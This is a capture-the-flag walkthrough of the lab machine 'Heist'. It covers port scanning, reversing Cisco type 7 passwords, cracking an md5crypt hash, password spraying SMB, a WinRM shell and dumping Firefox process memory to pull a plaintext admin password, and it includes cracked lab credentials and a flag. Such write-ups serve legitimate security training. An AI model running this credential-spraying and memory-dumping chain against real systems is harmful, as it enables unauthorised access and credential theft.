Heist [EASY🟢]

Difficulty: Easy

1- Reconnaissance and scanning

1.1 Ping

ping -c 1 10.10.10.149
❯ ping -c 1 10.10.10.149
PING 10.10.10.149 (10.10.10.149) 56(84) bytes of data.
64 bytes from 10.10.10.149: icmp_seq=1 ttl=127 time=172 ms

--- 10.10.10.149 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 171.839/171.839/171.839/0.000 ms

We can tell it is a Windows machine from the TTL:

TTL <= 64  >> Linux
TTL <= 128 >> Windows

1.2 Nmap

nmap -sS -sCV -p- --min-rate 5000 -n -Pn -vvv 10.10.10.149 -oN escaneo.txt
❯ nmap -sS -sCV -p- --min-rate 5000 -n -Pn -vvv 10.10.10.149 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 21:23 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating SYN Stealth Scan at 21:23
Scanning 10.10.10.149 [65535 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Completed SYN Stealth Scan at 21:24, 26.53s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 5 services on 10.10.10.149
Completed Service scan at 21:25, 56.49s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
NSE Timing: About 99.86% done; ETC: 21:25 (0:00:00 remaining)
Completed NSE at 21:25, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.76s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.01s elapsed
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.17s latency).
Scanned at 2025-03-09 21:23:40 -03 for 124s
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48515/tcp): CLEAN (Timeout)
|   Check 2 (port 7618/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 14421/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 1m58s
| smb2-time: 
|   date: 2025-03-10T00:27:04
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.61 seconds
           Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.012KB)

We have port 80 (Microsoft IIS 10.0), a web server; ports 135 and 139, common on Windows; and lastly, the interesting one, port 5985: in the exploitation and privilege escalation phases we will be able to connect through it with "evil-winrm".

1.3 whatweb

❯ whatweb 10.10.10.149
http://10.10.10.149 [302 Found] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.149], Microsoft-IIS[10.0], PHP[7.3.1], RedirectLocation[login.php], X-Powered-By[PHP/7.3.1]
http://10.10.10.149/login.php [200 OK] Bootstrap[3.3.7], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.149], JQuery[3.1.1], Microsoft-IIS[10.0], PHP[7.3.1], PasswordField[login_password], Script, Title[Support Login Page], X-Powered-By[PHP/7.3.1]

We see web technologies such as:

Bootstrap 3.3.7
Microsoft IIS 10.0
JQuery 3.1.1
PHP 7.3.1

We can enter the website as a guest.

1.4 crackmapexec

❯ crackmapexec smb 10.10.10.149
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)

2- Exploitation

2.1 Cisco Type 7 Password and John The Ripper

Let's enter the website as a guest:

There is an attachment in the post by the user "Hazard", who is asking about his Cisco router; let's see what it contains:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

We can see possible credentials:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

We also have users (including the user "Hazard", who posted the attachment):

rout3r   0242114B0E143F015F5D1E161713
admin    02375012182C1A1D751618034F36415408
Hazard
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

Let's try to crack these passwords. This is a hash format Cisco uses on its routers, which Cisco calls type 7; there are several websites for cracking these, in my case I'll use the following:

Cisco Type 7 Password Decrypter

I'll give it the password of the user "rout3r":

And now the admin user's:

So that:

rout3r   $uperP@ssword
admin    Q4)sJu\Y8qz*A3?d
Hazard
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
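As an added example (not part of the original write-up), a small Python audit of the attached config: it reverses the two type 7 strings offline with the well-known fixed IOS key, which is why type 7 is reversible obfuscation rather than a real hash, and it flags the enable secret 5 as a genuine md5crypt hash that needs an offline cracker such as John. The function names and the config excerpt are my own, taken from the file above.

```python
import re

# Cisco "type 7" is reversible obfuscation (a fixed-key XOR), not a hash.
# This constant is the well-known key shared by every IOS type 7 string.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 password string.

    Format: two decimal digits giving the starting offset into TYPE7_KEY,
    followed by hex byte pairs; each byte is XORed with the next key byte.
    """
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError(f"not a well-formed type 7 string: {encoded!r}")
    offset = int(encoded[:2], 10)
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


# Lines of interest in an IOS config: "username <name> ... password 7 <hex>" (reversible)
# and "enable secret 5 <md5crypt>" (a real salted hash, only recoverable by offline cracking).
_USER_PW7 = re.compile(r"^\s*username\s+(\S+)\s+.*?password\s+7\s+([0-9A-Fa-f]+)\s*$")
_ENABLE_SECRET = re.compile(r"^\s*enable\s+secret\s+(\d)\s+(\S+)\s*$")


def audit_ios_config(config_text: str) -> dict:
    """Return the reversible (type 7) credentials and the enable secret found in a config."""
    findings = {"type7": {}, "enable_secret": None}
    for line in config_text.splitlines():
        m = _USER_PW7.match(line)
        if m:
            findings["type7"][m.group(1)] = decode_type7(m.group(2))
            continue
        m = _ENABLE_SECRET.match(line)
        if m:
            findings["enable_secret"] = {"type": int(m.group(1)), "value": m.group(2)}
    return findings


# Excerpt of the router config attached to Hazard's post (copied from the write-up above).
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    result = audit_ios_config(SAMPLE_CONFIG)
    for user, pw in result["type7"].items():
        print(f"{user:8s} type 7 reverses to: {pw}")
    sec = result["enable_secret"]
    print(f"enable secret type {sec['type']} is a hash; crack it offline: {sec['value']}")
```

The defender's takeaway: "service password-encryption" only hides type 7 strings from shoulder surfing, so any config shared on a support portal should use type 5/8/9 secrets and be scrubbed before posting.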

We also have a hash on the following line:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

It looks like an MD5-based hash ($1$ is md5crypt), so let's store it in a text file to crack it later with John The Ripper.

❯ nvim hash_secret
❯ cat hash_secret
───────┬────────────────────────────────────
       │ File: hash_secret
───────┼────────────────────────────────────
   1   │ $1$pdQG$o8nrSzsGXeaduXrjlvKc91
───────┴────────────────────────────────────

And now let's crack it with John The Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt hash_secret

(In my case I'll use rockyou as the dictionary)

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash_secret
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)     
1g 0:00:00:43 DONE (2025-03-09 22:32) 0.02316g/s 81217p/s 81217c/s 81217C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And now the list of users and passwords looks like this:

rout3r           $uperP@ssword
admin            Q4)sJu\Y8qz*A3?d
Hazard
(enable secret)  stealth1agent

Let's store the users in one text file and the passwords in another:

❯ nvim users
❯ nvim passwords
❯ cat users
───────┬────────────────────────────────────
       │ File: users
───────┼────────────────────────────────────
   1   │ rout3r
   2   │ admin
   3   │ Hazard
───────┴────────────────────────────────────
❯ cat passwords
───────┬────────────────────────────────────
       │ File: passwords
───────┼────────────────────────────────────
   1   │ $uperP@ssword
   2   │ Q4)sJu\Y8qz*A3?d
   3   │ stealth1agent
───────┴────────────────────────────────────

2.2 Brute force against SMB with crackmapexec

Now, with these potential credentials, let's use crackmapexec to check whether any of these users match the passwords cracked above on the SMB service running on port 445:

crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success

(The "--continue-on-success" parameter makes it keep going after it finds a valid set of credentials instead of stopping)

❯ crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent

We have valid credentials:

User: Hazard
Password: stealth1agent

2.3 impacket-lookupsid

After trying the valid credentials, and even listing the shares with the user "hazard"'s credentials to check permissions, I found nothing interesting, so I took it for granted that none of the credentials was valid there; so let's enumerate users on the Windows machine over the SMB service with the tool "impacket-lookupsid":

impacket-lookupsid SUPPORTDESK/hazard:stealth1agent@10.10.10.149

First we specify the machine name "SUPPORTDESK", which we saw in the reconnaissance and scanning phase with crackmapexec, then the user and the password, and finally the IP address:

❯ impacket-lookupsid SUPPORTDESK/hazard:stealth1agent@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

We see 3 interesting users:

support
Chase
Jason

So let's add them to the "users" file created earlier and run crackmapexec again to brute force:

❯ nvim users
❯ cat users
───────┬────────────────────────────────────
       │ File: users
───────┼────────────────────────────────────
   1   │ rout3r
   2   │ admin
   3   │ Hazard
   4   │ support
   5   │ Chase
   6   │ Jason
───────┴────────────────────────────────────

And we run the same crackmapexec command as before:

crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success
❯ crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE

And now we also have the credentials of the user "Chase":

User: Chase
Password: Q4)sJu\Y8qz*A3?d

Let's validate the credentials with crackmapexec; if the validation ends with (Pwn3d!), we will be able to connect via "evil-winrm", since port 5985 is open and the user belongs to the "Remote Management Users" group:

crackmapexec winrm 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
❯ crackmapexec winrm 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
SMB         10.10.10.149    5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.10.10.149    5985   SUPPORTDESK      [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

We can connect via "evil-winrm".

2.4 Shell with evil-winrm

Let's connect with "evil-winrm" using the credentials obtained for the user "Chase":

evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
❯ evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> 

2.5 Getting the user flag

The user flag is located at the absolute path "C:\Users\Chase\Desktop\user.txt":

*Evil-WinRM* PS C:\Users\Chase\Documents> type "C:\Users\Chase\Desktop\user.txt"
b3d11a2c5f909fbefe85146fbb5279af
*Evil-WinRM* PS C:\Users\Chase\Documents> 

If we run "net user Chase", we can see that the user is in the "Remote Management Users" group:

*Evil-WinRM* PS C:\Users\Chase\Documents> net user Chase
User name                    Chase
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/22/2019 8:20:32 AM
Password expires             Never
Password changeable          4/22/2019 8:20:32 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/10/2025 7:33:57 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users  <-------
Global Group memberships     *None
The command completed successfully.

*Evil-WinRM* PS C:\Users\Chase\Documents> 

3- Privilege escalation

3.1 procdump64 (dumping a process's memory on Windows)

Let's list the processes running on the machine:

*Evil-WinRM* PS C:\Users\Chase\Documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    459      18     2304       5460               372   0 csrss
    290      13     2280       5196               484   1 csrss
    357      15     3444      14352              5056   1 ctfmon
    254      14     4012      13416              3764   0 dllhost
    166       9     1884       9600       0.05   6776   1 dllhost
    617      32    29992      58148               972   1 dwm
   1493      58    23916      78744              4408   1 explorer
    355      25    16396      38828       0.06   5860   1 firefox
   1069      70   151636     228032       5.91   6472   1 firefox
    347      19    10196      38592       0.08   6588   1 firefox
    401      34    32292      92632       0.98   6712   1 firefox
    378      28    22424      58984       0.48   7000   1 firefox
     49       6     1788       4592               784   1 fontdrvhost
     49       6     1516       3856               792   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    968      22     5668      14724               632   0 lsass
    223      13     3060      10204              3740   0 msdtc
      0      12      412      15300                88   0 Registry
    145       8     1608       7248              5504   1 RuntimeBroker
    302      16     5584      16956              5568   1 RuntimeBroker
    276      14     3080      14848              5976   1 RuntimeBroker
    675      32    19836      62028              5404   1 SearchUI
    538      11     5268       9856               616   0 services
    706      29    15264      52236              5304   1 ShellExperienceHost
    437      17     4740      23820              4748   1 sihost
     53       3      524       1160               268   0 smss
    471      22     5800      16244              2344   0 spoolsv
    286      13     5364      11976                64   0 svchost
    115       7     1236       5168               468   0 svchost
    199      12     1976       9316               488   0 svchost
    149       9     1712      11376               700   0 svchost
     85       5      876       3784               740   0 svchost
    861      20     6924      22256               760   0 svchost
    854      16     4996      11536               872   0 svchost
    254      11     1996       7436               920   0 svchost
    249      14     3076      13668               968   0 svchost
    377      13    10768      14616              1032   0 svchost
    223      11     2804      10848              1048   0 svchost
    140       7     1300       5576              1132   0 svchost
    123      15     3316       7192              1200   0 svchost
    211       9     2140       7392              1232   0 svchost
    184       9     1772       7380              1252   0 svchost
    228      12     2576      11180              1260   0 svchost
    431       9     2836       8908              1276   0 svchost
    154       7     1208       5516              1292   0 svchost
    127       7     1564       6212              1308   0 svchost
    170      10     1764       7864              1384   0 svchost
    339      13     4276      11492              1424   0 svchost
    238      11     2432       9616              1440   0 svchost
    368      18     4960      14020              1456   0 svchost
    243      13     3240       8388              1472   0 svchost
    302      11     2004       8636              1480   0 svchost
    321      10     2448       8248              1564   0 svchost
    191      12     2048      11828              1576   0 svchost
    163      10     2348       7344              1628   0 svchost
    396      31     8756      16812              1716   0 svchost
    194      11     2000       8096              1816   0 svchost
    160       8     2076       7188              1864   0 svchost
    479      20    12680      27052              2424   0 svchost
    261      13     2556       7764              2432   0 svchost
    400      16    10956      19876              2440   0 svchost
    179      22     2496       9712              2448   0 svchost
    166      12     3916      10692              2456   0 svchost
    133       9     1632       6484              2528   0 svchost
    136       8     1424       6040              2548   0 svchost
    126       8     1228       5264              2588   0 svchost
    205      11     2292       8272              2596   0 svchost
    209      12     1864       7368              2656   0 svchost
    231      14     4628      11692              2704   0 svchost
    267      19     3244      12112              2712   0 svchost
    168      10     2152      13160              2724   0 svchost
    462      16     3280      11616              2832   0 svchost
    381      23     3344      12120              3060   0 svchost
    353      19    14920      31468              4064   0 svchost
    162       9     4252      12032              4292   0 svchost
    230      12     3088      13504              4760   1 svchost
    371      18     5584      26912              4784   1 svchost
    210      11     2860      11820              4964   0 svchost
    171       9     1492       7232              4996   0 svchost
    193      15     6024       9996              5356   0 svchost
    167      11     2356      12972              5804   0 svchost
    163       9     3036       7596              5816   0 svchost
    309      16    14516      16640              6188   0 svchost
    312      20     9200      14236              6316   0 svchost
    122       7     1212       5508              6420   0 svchost
    254      13     3396      12628              7052   0 svchost
   1889       0      188        136                 4   0 System
    206      20     3776      11852              5016   1 taskhostw
    167      11     2900      10904              2632   0 VGAuthService
    142       8     1684       6864              2668   0 vm3dservice
    136       9     1812       7368              3104   1 vm3dservice
    383      22     9536      21932              2640   0 vmtoolsd
    236      18     5080      15004              6200   1 vmtoolsd
    171      11     1452       6868               476   0 wininit
    280      13     2812      12724               540   1 winlogon
    350      16     8592      18268              3980   0 WmiPrvSE
   1737      27    77640      95040       0.95   4452   0 wsmprovhost

We can see that Firefox is open on the machine:

    355      25    16396      38828       0.06   5860   1 firefox
   1069      70   151636     228032       5.91   6472   1 firefox
    347      19    10196      38592       0.08   6588   1 firefox
    401      34    32292      92632       0.98   6712   1 firefox
    378      28    22424      58984       0.48   7000   1 firefox

With PIDs 5860, 6472, 6588, 6712 and 7000; in my case I'll use PID 5860.

To dump the process memory we'll use the "procdump64" tool, since, if we recall the reconnaissance and scanning phase with crackmapexec, the machine is 64-bit:

ProcDump Download

It downloads a .ZIP file:

❯ ls
 lab_ttomiid.ovpn   Procdump.zip

Let's unzip it in the directory we were working from the last time we connected with "evil-winrm":

❯ mv Procdump.zip /home/t0mz/CTF/heist/content
❯ cd /home/t0mz/CTF/heist/content
❯ ls
 hash_secret   passwords   Procdump.zip   users
❯ unzip Procdump.zip
Archive:  Procdump.zip
  inflating: procdump.exe            
  inflating: procdump64.exe          
  inflating: procdump64a.exe         
  inflating: Eula.txt                
❯ ls
 Eula.txt   hash_secret   passwords   procdump.exe   Procdump.zip   procdump64.exe   procdump64a.exe   users

In our case, as mentioned earlier, we are specifically interested in "procdump64.exe", so let's upload it to the machine with the "upload" command built into "evil-winrm":

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload /home/t0mz/CTF/heist/content/procdump64.exe
                                        
Info: Uploading /home/t0mz/CTF/heist/content/procdump64.exe to C:\Users\Chase\Desktop\procdump64.exe
                                        
Data: 566472 bytes of 566472 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir 


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/10/2025   8:07 AM         424856 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        3/10/2025   5:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> 

Let's run it with the following command:

.\procdump64.exe -accepteula -ma 5860
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump64.exe -accepteula -ma 5860

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[08:08:20] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.exe_250310_080820.dmp
[08:08:20] Dump 1 writing: Estimated dump file size is 298 MB.
[08:08:23] Dump 1 complete: 298 MB written in 3.1 seconds
[08:08:24] Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/10/2025   8:08 AM      304638365 firefox.exe_250310_080820.dmp
-a----        3/10/2025   8:07 AM         424856 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        3/10/2025   5:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> 

It created the memory dump of PID 5860, the Firefox process open on the machine (firefox.exe_250310_080820.dmp).

And now, to download that file and inspect it as a binary with the "strings" command, we'll use the "download" command:

*Evil-WinRM* PS C:\Users\Chase\Desktop> download firefox.exe_250310_080820.dmp
                                        
Info: Downloading C:\Users\Chase\Desktop\firefox.exe_250310_080820.dmp to firefox.exe_250310_080820.dmp
Progress: 0% : |▒░░░░░░░░░░| 

This will take a long time, though, so while it downloads and the file grows we can already look at it with "strings", grepping for the keyword "password":

strings firefox.exe_250310_080820.dmp | grep password
❯ strings firefox.exe_250310_080820.dmp | grep password
security.ask_for_password
services.sync.engine.passwords.validation.percentageChance
security.insecure_password.ui.enabled
urlclassifier.passwordAllowTable
editor.password.testing.mask_delay
services.sync.engine.passwords.validation.interval
security.password_lifetime
editor.password.mask_delay
browser.safebrowsing.passwords.enabled
services.sync.engine.passwords
privacy.cpd.passwords
services.sync.engine.passwords.validation.maxRecords
goog-badbinurl-proto,goog-downloadwhite-proto,goog-phish-proto,googpub-phish-proto,goog-malware-proto,goog-unwanted-proto,goog-harmful-proto,goog-passwordwhite-proto
goog-passwordwhite-proto
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
chrome://passwordmgr/content/recipes.json
goog-downloadwhite-digest256,base-track-digest256,mozstd-trackwhite-digest256,content-track-digest256,mozplugin-block-digest256,mozplugin2-block-digest256,block-flash-digest256,except-flash-digest256,allow-flashallow-digest256,except-flashallow-digest256,block-flashsubdoc-digest256,except-flashsubdoc-digest256,goog-passwordwhite-proto,ads-track-digest256,social-track-digest256,analytics-track-digest256,base-fingerprinting-track-digest256,content-fingerprinting-track-digest256,base-cryptomining-track-digest256,content-cryptomining-track-digest256,fanboyannoyance-ads-digest256,fanboysocial-ads-digest256,easylist-ads-digest256,easyprivacy-ads-digest256,adguard-ads-digest256,social-tracking-protection-digest256,social-tracking-protection-facebook-digest256,social-tracking-protection-linkedin-digest256,social-tracking-protection-twitter-digest256
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localization/en-US/toolkit/passwordmgr/passwordManagerList.ftlPK
modules/services-sync/engines/passwords.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.xulPK
chrome/toolkit/content/passwordmgr/recipes.jsonPK
chrome/toolkit/skin/classic/global/passwordmgr.cssPK
chrome/pippki/content/pippki/changepassword.jsPK
